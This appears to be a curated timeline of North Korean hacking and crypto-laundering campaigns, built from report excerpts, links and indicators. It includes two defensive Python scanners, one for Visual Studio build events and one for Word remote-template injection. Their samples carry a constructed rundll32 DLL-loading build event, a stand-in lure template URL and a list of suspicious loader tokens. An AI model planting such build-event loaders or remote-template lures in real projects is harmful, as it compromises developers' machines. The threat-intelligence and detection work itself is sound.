- Why mixers? DPRK is a systematic money launderer, and their use of multiple mixers is a calculated attempt to obscure the origins of their ill-gotten cryptocurrencies while offramping into fiat. Why DeFi? DeFi platforms like DEXs provide liquidity for a wide range of ERC-20 tokens and altcoins that may not otherwise be convertible into cash. When DPRK swaps these coins for ETH or BTC they become much more liquid, and a larger variety of mixers and exchanges become usable. What’s more, DeFi platforms don’t take custody of user funds and many do not collect know-your-customer (KYC) information, meaning that cybercriminals can use these platforms without having their assets frozen or their
- DPRK’s stolen fund stockpile: $170M worth of old, unlaundered cryptocurrency holdings. Chainalysis has identified $170M in current balances—representing the stolen funds of 49 separate hacks spanning from 2017 to 2021—that are controlled by North Korea but have yet to be laundered through services. The ten largest balances by dollar value are listed below.
- Of DPRK’s total holdings, roughly $35M came from attacks in 2020 and 2021. By contrast, more than $55M came from attacks carried out in 2016—meaning that DPRK has massive unlaundered balances as much as six years old.
- Government-backed entity based in North Korea. Social media targeting.
- the actors established a research blog and multiple Twitter profiles to interact with potential targets. They've used these Twitter profiles for posting links to their blog, posting videos of their claimed exploits and for amplifying and retweeting posts from other accounts that they control.
- Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including “guest” posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers.
- After establishing initial communications, the actors would ask the targeted researcher if they wanted to collaborate on vulnerability research together, and then provide the researcher with a Visual Studio Project. Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional DLL that would be executed through Visual Studio Build Events. The DLL is custom malware that would immediately begin communicating with actor-controlled C2 domains. An example of the VS Build Event can be seen in the image below.
- In addition to targeting users via social engineering, we have also observed several cases where researchers have been compromised after visiting the actors’ blog. In each of these cases, the researchers have followed a link on Twitter to a write-up hosted on blog.br0vvnn[.]io, and shortly thereafter, a malicious service was installed on the researcher’s system and an in-memory backdoor would begin beaconing to an actor-owned command and control server. At the time of these visits, the victim systems were running fully patched and up-to-date Windows 10 and Chrome browser versions.
- These actors have used multiple platforms to communicate with potential targets, including Twitter, LinkedIn, Telegram, Discord, Keybase and email
- https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/
- https://apnews.com/article/malware-media-north-korea-social-media-south-korea-7dc8a5a9a3576005a615524d1ba439aa
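The Build Events abuse described above can be checked for on the defender's side: a shared project file should not launch loaders or extra DLLs at build time. The scanner below is an added example, not code from the original post or from Google TAG; the sample `.vcxproj`, its paths and `helper.dll` are constructed and hypothetical.

```python
"""Scan a Visual Studio .vcxproj for build events that run extra binaries.

Added example (not from the original post or from Google TAG): lists every
PreBuild/PreLink/PostBuild command in a project and flags the ones that
reference a loader or a DLL, the pattern the campaign above relied on.
"""
import xml.etree.ElementTree as ET

MSBUILD_NS = "http://schemas.microsoft.com/developer/msbuild/2003"
EVENT_TAGS = ("PreBuildEvent", "PreLinkEvent", "PostBuildEvent")
# Illustrative tokens only; tune to the environment, this list is not exhaustive
SUSPICIOUS_TOKENS = ("rundll32", "regsvr32", "powershell", "cmd.exe", ".dll")

# Constructed sample project: one benign copy step and one post-build event that
# loads a DLL through rundll32. All paths and file names are hypothetical.
SAMPLE_VCXPROJ = """<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <ClCompile><Optimization>Disabled</Optimization></ClCompile>
    <PreBuildEvent>
      <Command>copy /y $(SolutionDir)\\resources\\data.bin $(OutDir)</Command>
    </PreBuildEvent>
    <PostBuildEvent>
      <Command>rundll32.exe $(ProjectDir)\\helper.dll,Start</Command>
    </PostBuildEvent>
  </ItemDefinitionGroup>
</Project>
"""


def find_build_events(vcxproj_xml: str) -> list[tuple[str, str]]:
    """Return (event_tag, command) for every non-empty build-event command."""
    root = ET.fromstring(vcxproj_xml)
    found = []
    for tag in EVENT_TAGS:
        # MSBuild elements carry the MSBuild namespace, so match the qualified name
        for event in root.iter(f"{{{MSBUILD_NS}}}{tag}"):
            cmd = event.find(f"{{{MSBUILD_NS}}}Command")
            if cmd is not None and cmd.text and cmd.text.strip():
                found.append((tag, cmd.text.strip()))
    return found


def suspicious_build_events(vcxproj_xml: str) -> list[tuple[str, str]]:
    """Keep only events whose command mentions a known loader or a DLL."""
    return [
        (tag, cmd)
        for tag, cmd in find_build_events(vcxproj_xml)
        if any(tok in cmd.lower() for tok in SUSPICIOUS_TOKENS)
    ]


if __name__ == "__main__":
    for tag, cmd in find_build_events(SAMPLE_VCXPROJ):
        print(f"{tag}: {cmd}")
    for tag, cmd in suspicious_build_events(SAMPLE_VCXPROJ):
        print(f"SUSPICIOUS {tag}: {cmd}")
```

Run it over every `.vcxproj` and `.csproj` in a project received from an outside collaborator before opening the solution in Visual Studio, since build events run as soon as the project is built.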
- targeting individuals and companies, including cryptocurrency exchanges and financial service companies, through the dissemination of cryptocurrency trading applications that have been modified to include malware that facilitates theft of cryptocurrency
- the malicious application—seen on both Windows and Mac operating systems—appears to be from a legitimate cryptocurrency trading company, thus fooling individuals into downloading it as a third-party application from a website that seems legitimate
- infecting victims through legitimate-looking websites, HIDDEN COBRA actors also use phishing, social networking, and social engineering techniques to lure users into downloading the malware.
- Celas Trade Pro, JMT Trading, Union Crypto, Kupay Wallet, CoinGoTrade, Dorusio, Ants2Whale
- Joint FBI-CISA-Treasury
- CISA, FBI, and the Department of the Treasury released a Joint Cybersecurity Advisory and seven MARs on the North Korean government’s dissemination of malware that facilitates the theft of cryptocurrency—referred to by the U.S. Government as “AppleJeus.”
2021-02-20: Ghaleb Alaumary + Ramon Abbas (Hushpuppi) named in ‘North Korean-perpetrated cyber-enabled’ heist
- https://www.justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and
- Nigerian Instagram celebrity Ramon Abbas, also known as Hushpuppi, has been named in another case in the United States, this time with North Korean hackers involved.
- The United States Justice Department said Hushpuppi conspired with a Canadian-American citizen Ghaleb Alaumary and others to launder funds from a North Korean-perpetrated cyber-enabled heist from a Maltese bank in February 2019.
- Hushpuppi is currently facing separate trial for conspiring “to launder hundreds of millions of dollars from BEC frauds and other scams.”
- “The affidavit also alleges that Abbas conspired to launder funds stolen in a $14.7 million cyber-heist from a foreign financial institution in February 2019, in which the stolen money was sent to bank accounts around the world.
- Federal prosecutors today also unsealed a charge against Ghaleb Alaumary, 37, of Mississauga, Ontario, Canada, for his role as a money launderer for the North Korean conspiracy, among other criminal schemes. Alaumary agreed to plead guilty to the charge, which was filed in the U.S. District Court in Los Angeles on Nov. 17, 2020. Alaumary was a prolific money launderer for hackers engaged in ATM cash-out schemes, cyber-enabled bank heists, business email compromise (BEC) schemes, and other online fraud schemes. Alaumary is also being prosecuted for his involvement in a separate BEC scheme by the U.S. Attorney’s Office for the Southern District of Georgia.
- With respect to the North Korean co-conspirators’ activities, Alaumary organized teams of co-conspirators in the United States and Canada to launder millions of dollars obtained through ATM cash-out operations, including from BankIslami and a bank in India in 2018.
- Alaumary also conspired with Ramon Olorunwa Abbas, aka “Ray Hushpuppi,” and others to launder funds from a North Korean-perpetrated cyber-enabled heist from a Maltese bank in February 2019. Last summer, the U.S. Attorney’s Office in Los Angeles charged Abbas in a separate case alleging that he conspired to launder hundreds of millions of dollars from BEC frauds and other scams.
- https://www.justice.gov/opa/pr/first-north-korean-national-brought-united-states-stand-trial-money-laundering-offenses
- https://www.cnbc.com/2021/03/22/north-korea-national-extradited-to-us-faces-money-laundering-charges.html
- https://www.scmp.com/news/asia/east-asia/article/3126520/north-korean-businessman-mun-chol-myong-us-court-after
- protectoffice[.]club
- https://twitter.com/fr0s7_/status/1381328726819020804
2021-04-26: The Incredible Rise of North Korea’s Hacking Army - Lazarus group’s criminal enterprises including cryptocurrency exchange heists and ransomware attacks
2021-06-03: ClearSky's report on the Crypto Core APT group attributing it to the North Korean Lazarus APT
- Authorities say Ramon Abbas, aka Hushpuppi, perfected a simple internet scam and laundered millions of dollars. His past says a lot about digital swagger, and the kinds of stories that get told online.
- https://www.bloomberg.com/features/2021-hushpuppi-gucci-influencer/
2021-09-10: Rapid Change of Stablecoin (Protected).docx secure.azureword[.]com Z Venture Capital Presentation(Protected).docx
- https://twitter.com/Circuitous/status/1436456000584880129
- https://twitter.com/Circuitous/status/1442888312755302400
2021-09-16: Ghaleb Alaumary sentenced to 11 years in jail for laundering funds such as those coming from a banking heist by North Korean actors
2022-01-13: North Korean Hackers Have Prolific Year as Their Unlaundered Cryptocurrency Holdings Reach All-time High
- TAG discovered two distinct North Korean attacker groups exploiting a remote code execution vulnerability
- Operation Dream Job + Operation AppleJeus
2022-03-23: FireEye/Mandiant - Not So Lazarus: Mapping DPRK Cyber Threat Groups to Government Organizations
2022-03-24: CVE-2022-0609 Google posts update about zero day CVE-2022-0609 - Operation Dream Job and Operation AppleJeus
- Campaigns targeting U.S. based organizations spanning news media, IT, cryptocurrency and fintech industries.
- Targeted over 250 individuals working for 10 different news media, domain registrars, web hosting providers and software vendors. The targets received emails claiming to come from recruiters at Disney, Google and Oracle with fake potential job opportunities. The emails contained links spoofing legitimate job hunting websites like Indeed and ZipRecruiter.
- Operation AppleJeus targeted over 85 users in cryptocurrency and fintech industries leveraging the same exploit kit. This included compromising at least two legitimate fintech company websites and hosting hidden iframes to serve the exploit kit to visitors. In other cases, we observed fake websites — already set up to distribute trojanized cryptocurrency applications — hosting iframes and pointing their visitors to the exploit kit.
- The campaign begins by sending them phishing emails purporting to be from recruiters at Disney, Google, and Oracle, offering them false employment opportunities. The emails included links to bogus job-search websites such as Indeed and ZipRecruiter. Targets who clicked on the included malicious URLs were infected with drive-by browser malware downloads. The North Korean groups were utilizing an exploit kit (CVE-2022-0609) with hidden iframes embedded into a variety of websites. The attack kit may fingerprint target devices by collecting details like user-agent and screen resolution. After that the exploit kit executes a Chrome remote code execution exploit capable of bypassing the lauded Chrome sandbox to move out onto the system.
- https://blog.google/threat-analysis-group/countering-threats-north-korea/
- We recently discovered a Trojanized DeFi application that was compiled in November 2021. This application contains a legitimate program called DeFi Wallet that saves and manages a cryptocurrency wallet,
- https://securelist.com/lazarus-trojanized-defi-app/106195/
- In this attack, Lazarus built a type of decoy document containing an “AhnLab” icon and prompt information. The prompts for these documents vary, but the common goal is to trick victims into enabling Office’s document editing capabilities. AhnLab is a cyber security vendor with its headquarters in South Korea. Lazarus uses the name to increase the persuasiveness of the decoy document.
- Another type of decoy document contains Binance icons and related tips. Binance is a cryptocurrency trading platform.
- Type Confusion, V8 Engine
- 0x098B716B8Aaf21512996dC57EB0615e2383E2f96
- https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20220414
- https://asec.ahnlab.com/en/36368/
- https://asec.ahnlab.com/en/37078/
- https://asec.ahnlab.com/en/37396/
- https://www.sentinelone.com/blog/lazarus-operation-interception-targets-macos-users-dreaming-of-jobs-in-crypto/
- https://finbold.com/lazarus-hackers-target-macos-users-luring-them-with-crypto-dream-job-offers/
- https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20221007
- https://home.treasury.gov/news/press-releases/jy1000
- https://asec.ahnlab.com/en/39828/
2022-10-13: With more than $3B already stolen, 2022 is on pace to become crypto’s ‘biggest year for hacking on record’
2022-10-25: Malicious app suspected to be created by a North Korean hacker organization aimed at stealing cryptocurrency discovered
- https://asec.ahnlab.com/ko/40552/
2022-11-01: Lazarus Group had been observed targeting public and private sector research organizations, medical research and energy sectors, as well as their supply chains. This campaign, dubbed “No Pineapple”, focused on intelligence-gathering, starting with an attack on a company that was exploited through CVE-2022-27925 (remote code execution) and CVE-2022-37042 (authentication bypass) – two vulnerabilities affecting the digital collaboration
2023-01-11: Lazarus - The suspected APT-C-26 (Lazarus) organization conducts attack activity analysis through cryptocurrency wallet promotion information
- Kimsuky distributed document-type malware targeting security experts, which uses an external object within a Word document to execute an additional malicious macro (template Injection method).
- https://www.cfr.org/blog/north-koreas-cryptocurrency-craze-and-its-impact-us-policy
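The template injection technique noted above leaves a recognisable trace in the file: a `w:attachedTemplate` reference in `word/settings.xml` whose relationship in `word/_rels/settings.xml.rels` has `TargetMode="External"`, so Word fetches the macro-carrying template from a URL when the document is opened. The scanner below is an added example, not code from the original post or from AhnLab; the sample document it builds and the `example.invalid` URL are constructed for the demonstration.

```python
"""Detect remote-template (template injection) relationships in a .docx.

Added example, not from the original post or from AhnLab. It builds a minimal
docx in memory (constructed sample) and reports any attachedTemplate
relationship that points to an external target.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = "/attachedTemplate"  # suffix of the relationship Type URI

DOC_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/>
</Relationships>"""

# Relationship file for settings.xml; an external attachedTemplate is the injection marker
SETTINGS_RELS_EXTERNAL = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="{target}" TargetMode="External"/>
</Relationships>"""

SETTINGS_RELS_EMPTY = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>"""


def build_sample_docx(template_target: str = "") -> bytes:
    """Construct a minimal docx in memory; an empty target yields a benign file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/settings.xml", "<w:settings/>")
        z.writestr("word/_rels/document.xml.rels", DOC_RELS)
        rels = SETTINGS_RELS_EXTERNAL.format(target=template_target) if template_target else SETTINGS_RELS_EMPTY
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


def external_templates(docx_bytes: bytes) -> list[str]:
    """Return the external Target of every attachedTemplate relationship in the package."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        # The template relationship normally sits in settings.xml.rels, but every
        # .rels part is checked so a relocated relationship is not missed
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type", "").endswith(ATTACHED_TEMPLATE) and rel.get("TargetMode") == "External":
                    hits.append(rel.get("Target", ""))
    return hits


if __name__ == "__main__":
    # Constructed sample URL; a real lure would point at attacker infrastructure
    suspect = build_sample_docx("http://example.invalid/lure.dotm")
    print("external templates:", external_templates(suspect))
    print("benign document:", external_templates(build_sample_docx()))
```

A legitimate document can reference a template on a corporate file share, so treat a hit as a triage signal and inspect the target host rather than blocking on the relationship alone.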
2023-01-17: Malware Disguised as a Manuscript Solicitation Letter (Targeting Security-Related Workers)
2023-01-23: FBI Confirms Lazarus Group Cyber Actors Responsible for Harmony's Horizon Bridge Currency Theft
2023-02-09: CISA - Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-040a
- Same tactics used as in Malware Disguised as a Manuscript Solicitation Letter (Targeting Security-Related Workers); in this case, the threat actor used an image that prompts users to execute the macro.
- https://asec.ahnlab.com/en/47585/
- The Lazarus Group carried out anti-forensics to conceal their malicious activities. They transmitted a configuration file with C2 information and a PE file that communicates with the C2 server in encrypted forms to evade detection by security products. The encrypted files operate after being decrypted onto the memory by the loader file. They then receive additional files from the C2 and perform malicious actions.
- https://asec.ahnlab.com/en/48223/
2023-02-16: Økokrim has seized almost NOK 60 million in cryptocurrency. This is the largest amount of cryptocurrency ever seized by the Norwegian police
- In late March 2023, 3CX disclosed that its desktop applications for both Windows and macOS were compromised with malicious code that gave attackers the ability to download and run code on all machines where the app was installed. 3CX says it has more than 600,000 customers and 12 million users in a broad range of industries, including aerospace, healthcare and hospitality.
- 3CX hired incident response firm Mandiant, which released a report on Wednesday that said the compromise began in 2022 when a 3CX employee installed a malware-laced software package distributed via an earlier software supply chain compromise that began with a tampered installer for X_TRADER, a software package provided by Trading Technologies.
- “This is the first time Mandiant has seen a software supply chain attack lead to another software supply chain attack”
- https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack/
- https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/
- https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/
- https://news.sophos.com/en-us/2023/03/29/3cx-dll-sideloading-attack/
- https://blog.checkpoint.com/2023/03/29/3cxdesktop-app-trojanizes-in-a-supply-chain-attack-check-point-customers-remain-protected/
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3cx-supply-chain-attack
- https://www.trendmicro.com/fr_fr/research/23/c/information-on-attacks-involving-3cx-desktop-app.html
- https://twitter.com/patrickwardle/status/1641294247877021696
- https://objective-see.org/blog/blog_0x73.html
- https://www.elastic.co/kr/security-labs/elastic-users-protected-from-suddenicon-supply-chain-attack
- https://twitter.com/dez_/status/1641459372478935040
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-048a
- https://www.cybersecuritydive.com/news/3cx-mandiant-investigate-supply-chain-attack/646543/
- https://www.crn.com/news/security/3cx-supply-chain-attack-big-questions-remain
- https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/
- https://securelist.com/operation-applejeus-sequel/95596/
- https://www.3cx.com/blog/news/mandiant-initial-results/
- https://krebsonsecurity.com/2023/04/3cx-breach-was-a-double-supply-chain-compromise/
- https://explore.avertium.com/resource/lazarus-and-the-3cx-double-supply-chain-attack
- https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/
- https://www.mandiant.com/resources/blog/apt43-north-korea-cybercrime-espionage
- https://blog.google/threat-analysis-group/how-were-protecting-users-from-government-backed-attacks-from-north-korea/
- https://blog.virustotal.com/2023/04/apt43-investigation-into-north-korean.html
- Jamf Threat Labs has discovered a macOS malware family that communicates with command and control (C2) servers to download and execute various payloads. This attribution is due to the similarities noted in a Kaspersky blog
- https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/
- https://securelist.com/bluenoroff-methods-bypass-motw/108383/
2023-04-24: North Korean Foreign Trade Bank Representative Charged in Crypto Laundering Conspiracies
- https://www.justice.gov/opa/pr/north-korean-foreign-trade-bank-representative-charged-crypto-laundering-conspiracies
- Sim Hyon Sop + Wu Huihu - 1G3Qj4Y4trA8S64zHFsaD5GtiSwX19qwFv
2023-05-10: Half of North Korean missile program funded by cyberattacks and crypto theft, White House says
2023-05-19: APT-C-28 (ScarCruft) Organization Uses Malicious Documents to Deliver RokRAT Attack Activity Analysis
- Today, cybersecurity firm Mandiant published a report on a prolific North Korean state-sponsored hacking group it's now calling APT43, sometimes known by the names Kimsuky and Thallium. The group, whose activities suggest its members work in the service of North Korea's Reconnaissance General Bureau spy agency, has been primarily focused on espionage, hacking think tanks, academics, and private industry from the US to Europe, South Korea, and Japan since at least 2018, mostly with phishing campaigns designed to harvest credentials from victims and plant malware on their machines.
- Like many North Korean hacker groups, APT43 also maintains a sideline in profit-focused cybercrime, according to Mandiant, stealing any cryptocurrency that can enrich the North Korean regime or even just fund the hackers' own operations. And as regulators worldwide have tightened their grip on exchanges and laundering services that thieves and hackers use to cash out criminally tainted coins, APT43 appears to be trying out a new method to cash out the funds it steals while preventing them from being seized or frozen: It pays that stolen cryptocurrency into “hashing services” that allow anyone to rent time on computers used to mine cryptocurrency, harvesting newly mined coins that have no apparent ties to criminal activity.
- https://www.mandiant.com/resources/blog/apt43-north-korea-cybercrime-espionage
- https://web.archive.org/web/20230328150400/https://www.wired.com/story/north-korea-apt43-crypto-mining-laundering/
2023-06-06: Kimsuky - Kimsuky Strikes Again | New Social Engineering Campaign Aims to Steal Credentials and Gather Strategic Intelligence
- Kimsuky conducted a social engineering campaign targeting experts in DPRK issues to steal Google and subscription credentials of a reputable news and analysis service focusing on the DPRK, as well as deliver reconnaissance malware. Kimsuky also engaged in extensive email correspondence and used spoofed URLs, websites imitating legitimate web platforms and Office documents weaponized with the ReconShark malware. The activity indicates Kimsuky’s growing dedication to social engineering and highlights the group’s increasing interest in gathering strategic intelligence.
- https://www.sentinelone.com/labs/kimsuky-new-social-engineering-campaign-aims-to-steal-credentials-and-gather-strategic-intelligence/
- https://securelist.com/lazarus-andariel-mistakes-and-easyrat/110119/
- https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/
- https://blog.talosintelligence.com/lazarus-magicrat/
- https://asec.ahnlab.com/en/34461/
- https://www.recordedfuture.com/north-koreas-cyber-strategy
- https://go.recordedfuture.com/hubfs/reports/cta-nk-2023-0622.pdf
2023-07-28: Scarcruft - Detecting Ongoing STARK#MULE Attack Campaign Targeting Victims Using US Military Document Lures
- ScarCruft lured victims using U.S. military-related documents to run malware staged from legitimate compromised Republic of Korea websites. The goal seems to have been to spark the recipient’s curiosity enough to have them open the attached documents and inadvertently execute the contained malware
- https://www.securonix.com/blog/detecting-ongoing-starkmule-attack-campaign-targeting-victims-using-us-military-document-lures/
2023-07-27: JumpCloud
- On June 11, Phylum’s automated risk detection platform alerted us to a peculiar pattern of publications on NPM. The packages in question seem to be published in pairs
- Two weeks after the IT management firm JumpCloud announced that it was the victim of a supply chain attack aimed at a small population of customers in the cryptocurrency industry, an investigation by ReversingLabs researchers has uncovered evidence of more malicious npm packages, with links to the same infrastructure that also appear to target cryptocurrency providers.
- Specifically, ReversingLabs identified a number of additional npm packages with links to the same malicious campaign. One, named btc-api-node, was uploaded to npm on July 11th and has links to a supply chain attack first identified by the firm Phylum on June 23.
- https://blog.phylum.io/junes-sophisticated-npm-attack-attributed-to-north-korea/
- https://www.mandiant.com/resources/blog/north-korea-supply-chain
- https://jumpcloud.com/blog/security-update-incident-details
- https://jumpcloud.com/support/july-2023-iocs
- https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-108a
- https://blog.phylum.io/sophisticated-ongoing-attack-discovered-on-npm/
- https://www.sentinelone.com/labs/jumpcloud-intrusion-attacker-infrastructure-links-compromise-to-north-korean-apt-activity/
- 3LU8wRu4ZnXP4UM8Yo6kkTiGHM9BubgyiG
- 39idqitN9tYNmq3wYanwg3MitFB5TZCjWu
- 3AAUBbKJorvNhEUFhKnep9YTwmZECxE4Nk
- 3PjNaSeP8GzLjGeu51JR19Q2Lu8W2Te9oc
- 3NbdrezMzAVVfXv5MTQJn4hWqKhYCTCJoB
- 34VXKa5upLWVYMXmgid6bFM4BaQXHxSUoL
- https://www.fbi.gov/news/press-releases/fbi-identifies-cryptocurrency-funds-stolen-by-dprk
- https://therecord.media/us-arrests-tornado-cash-cofounder
- https://www.justice.gov/usao-sdny/pr/tornado-cash-founders-charged-money-laundering-and-sanctions-violations
- https://home.treasury.gov/news/press-releases/jy1702
- https://blog.talosintelligence.com/lazarus-collectionrat/
- https://blog.talosintelligence.com/lazarus-quiterat/
- https://www.reversinglabs.com/blog/vmconnect-supply-chain-campaign-continues
- https://www.reversinglabs.com/blog/vmconnect-malicious-pypi-packages-imitate-popular-open-source-modules
- In January 2021, a DPRK cyber actor campaign was publicly disclosed, in which they used 0-day exploits to target security researchers working on vulnerability research and development. Over the past two and a half years, the campaign has continued. Recently, DPRK cyber actors were found to likely be responsible for a new, similar campaign, with at least one actively exploited 0-day being used to target security researchers in the past several weeks. DPRK threat actors used social media sites like X (formerly Twitter) to build rapport with their targets. After initial contact via X, they moved to an encrypted messaging app such as Signal, WhatsApp or Wire. Once a relationship was developed with a targeted researcher, the threat actors sent a malicious file that contained at least one 0-day in a popular software package. Upon successful exploitation, the shellcode conducts a series of anti-virtual machine checks and then sends the collected information, along with a screenshot, back to an attacker-controlled command and control domain. The shellcode used in this exploit is constructed in a similar manner to shellcode observed in previous North Korean exploits.
- https://blog.google/threat-analysis-group/active-north-korean-campaign-targeting-security-researchers/
2023-09-18: Scarcruft exploits WinRAR vulnerability (CVE-2023-38831) targeting the cryptocurrency industry
- https://paper.seebug.org/3033/
- This recent wave of attacks is noteworthy for revealing that, apart from the Lazarus Group, there are other North Korean-affiliated entities engaging in targeted operations against the cryptocurrency industry, which is relatively uncommon in the security community.
- The targets of this Konni group's recent attacks are notably different from their previous activities. Judging by the lure name, the attacks are directed towards the cryptocurrency industry. It is speculated that Konni may be exploring new attack vectors. The captured sample is named "wallet_Screenshot_2023_09_06_Qbao_Network.zip", and it references Qbao Network, which is described as follows:
2023-10-19: How North Korean Workers Tricked U.S. Companies into Hiring Them and Secretly Funneled Their Earnings into Weapons Programs
- https://www.zetter-zeroday.com/p/how-north-korean-workers-tricked
- https://apnews.com/article/north-korea-weapons-program-it-workers-f3df7c120522b0581db5c0b9682ebc9b
- https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-action-disrupt-illicit-revenue-generation
- https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/
- https://www.bleepingcomputer.com/news/security/microsoft-lazarus-hackers-breach-cyberlink-in-supply-chain-attack/
- https://www.microsoft.com/en-us/security/blog/2023/11/22/diamond-sleet-supply-chain-compromise-distributes-a-modified-cyberlink-installer/
- https://www.slideshare.net/MITREATTACK/exploring-the-labyrinth-deep-dive-into-the-lazarus-groups-foray-into-macos
- This talk will deep dive into the interactive macOS intrusions Crowdstrike has attributed to LABYRINTH CHOLLIMA. We will delve into the adversary's macOS tradecraft, techniques to circumvent existing OS protections, and social engineering tactics, while showcasing how their mechanisms and tooling map to the MITRE ATT&CK kill chain, featuring some newly proposed MITRE techniques related to the Transparency, Consent, and Control (TCC) database.
- Kimsuky has created a FastViewer variant that induces a victim to install the app onto their mobile device by disguising the malware as a legitimate Android application (APK file), such as Google Authenticator, an anti-virus program, or a payment service application. The FastViewer malware receives commands directly from the server without downloading additional malware, and the main purpose of this FastViewer variant is to steal information from infected devices. It appears that Kimsuky has developed this malware since at least July 2023 to target Republic of Korea victims. The report further notes that the disguised applications are expected to be distributed via spearphishing emails or smishing to trick targets into running them.
- https://medium.com/s2wblog/fastviewer-variant-merged-with-fastspy-and-disguised-as-a-legitimate-mobile-application-f3004588f95c
2023-10-31: Lazarus Targets Blockchain Engineers With New KandyKorn macOS Malware
- https://securityaffairs.com/153622/uncategorized/lazarus-kandykorn-malware.html
- https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn
- https://blog.phylum.io/crypto-themed-npm-packages-found-delivering-stealthy-malware/
- puma-com 5.0.3 2023-10-30 01:49:09 troll1234 jacktroll83@gmail.com
- erc20-testenv 5.0.3 2023-10-31 04:28:15 terek1234 terekhovstanislav2@gmail.com
- blockledger 5.0.3 2023-10-31 09:03:03 xxx145465 xxx145465@gmail.com
- cryptotransact 5.0.3 2023-10-31 09:18:57 sandwich1901001 sandwich190100@outlook.com
- chainflow 5.0.3 2023-11-02 11:40:14 troll1234 jacktroll83@gmail.com
- https://www.bleepingcomputer.com/news/security/microsoft-bluenoroff-hackers-plan-new-crypto-theft-attacks/
- https://twitter.com/MsftSecIntel/status/1722316019920728437
- https://www.nknews.org/2023/11/two-south-koreans-indicted-for-allegedly-colluding-with-north-korean-hackers/
- https://www.spo.go.kr/site/spo/ex/board/View.do?cbIdx=1403&bcIdx=1043403
2023-11-21: Palo Alto - Hacking Employers and Seeking Employment: Two Job-Related Campaigns Bear Hallmarks of North Korean Threat Actors
- https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/
- Contagious Interview as CL-STA-0240
- Wagemole and track it as CL-STA-0241
- https://protos.com/korean-govt-officials-targeted-by-norths-journalist-crypto-hackers/
- https://koreajoongangdaily.joins.com/news/2023-11-22/national/northKorea/Norths-hackers-pose-as-officials-journalists-to-steal-info-and-crypto/1919045
2023-11-22: Microsoft: Diamond Sleet supply chain compromise distributes a modified CyberLink installer
- https://www.microsoft.com/en-us/security/blog/2023/11/22/diamond-sleet-supply-chain-compromise-distributes-a-modified-cyberlink-installer/
- Microsoft has observed suspicious activity associated with the modified CyberLink installer file as early as October 20, 2023. The malicious file has been seen on over 100 devices in multiple countries, including Japan, Taiwan, Canada, and the United States. While Microsoft has not yet identified hands-on-keyboard activity carried out after compromise via this malware, the group has historically:
- If these criteria are not met, the executable continues running the CyberLink software and abandons further execution of malicious code. Otherwise, the software attempts to contact one of three URLs to download the second-stage payload embedded inside a file masquerading as a PNG file using the static User-Agent ‘Microsoft Internet Explorer’
- When invoked, the in-memory executable attempts to contact the following callbacks for further instruction. Both domains are legitimate but have been compromised by Diamond Sleet.
- https://asec.ahnlab.com/en/57736/
- https://www.bleepingcomputer.com/news/security/uk-and-south-korea-hackers-use-zero-day-in-supply-chain-attack/
- https://www.documentcloud.org/documents/24174869-rok-uk-joint-cyber-security-advisoryeng
- https://asec.ahnlab.com/wp-content/uploads/2023/10/20231013_Lazarus_OP.Dream_Magic.pdf
- https://www.bleepingcomputer.com/news/security/us-govt-sanctions-north-koreas-kimsuky-hacking-group/
2023-12-10: Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang
- Malware families: HazyLoad, NineRAT, BottomLoader, DLRAT
- https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/
